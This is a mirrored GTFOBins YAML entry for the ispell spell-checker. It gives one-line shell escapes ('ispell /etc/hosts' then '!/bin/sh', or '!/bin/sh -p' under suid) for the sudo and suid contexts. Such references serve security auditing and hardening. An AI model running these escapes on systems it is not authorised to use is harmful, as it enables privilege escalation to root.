1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/ispell

16 lines
226 B
Plaintext

---
functions:
shell:
- code: |-
ispell /etc/hosts
!/bin/sh
contexts:
sudo:
suid:
code: |-
ispell /etc/hosts
!/bin/sh -p
shell: false
unprivileged:
...